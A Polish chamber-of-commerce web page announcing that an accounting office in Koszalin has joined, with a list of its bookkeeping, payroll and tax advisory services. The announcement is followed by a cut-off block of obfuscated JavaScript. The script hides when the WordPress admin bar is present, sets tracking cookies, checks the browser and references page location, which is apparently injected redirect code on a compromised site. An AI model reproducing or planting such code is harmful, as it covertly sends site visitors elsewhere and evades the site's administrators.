Nowa firma w Izbie! | Północna Izba Gospodarcza w Koszalinie

Miło nam poinformować, że do naszej Izby dołączyła nowa firma – Biuro Rachunkowe Beti.
 
W ofercie biura m.in.:
 
✔️ Księgowość:
 
– prowadzenie ksiąg handlowych,
– prowadzenie książki przychodów i rozchodów,
– ewidencja przychodów dla celów zryczałtowanego podatku dochodowego od osób fizycznych,
– ewidencja rejestrów dla celów rozliczenia podatku od towarów i usług VAT,
– sporządzanie ewidencji środków trwałych i wyposażenia,
 
✔️ Kadry:
 
– sporządzanie listy płac,
– sporządzanie kartotek wynagrodzenia pracowniczego,
– rozliczanie podatku dochodowego od pracowników,
– obsługa kadrowa
 
✔️ Doradztwo:
 
– porady w zakresie zmniejszania obciążeń podatkowych i ZUS-owskich
– rozliczanie klientów indywidualnych z osiągniętych dochodów (PIT-y)
– konsultacje i doradztwo w sprawach prowadzenia firmy; czyli kompleksowa obsługa osób prawnych i fizycznych
– opracowanie dokumentów oraz rejestracja firm we wszystkich formach własności,
– organizacja obiegu dokumentów,
– sporządzanie raportów finansowych,
– kontrola rozrachunków.
 
⭐️ Cały czas podnosimy jakość świadczonych usług przez rozszerzanie swojej oferty. Biuro ponosi pełną odpowiedzialność za prawidłowość prowadzonych ksiąg i rozliczeń klientów przed US i ZUS.
 
Biuro Rachunkowe Beti
Zwycięstwa 138 w Koszalinie
Tel. 94 341-17-84
 
 
Serdecznie witamy i zapraszamy do współpracy!

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m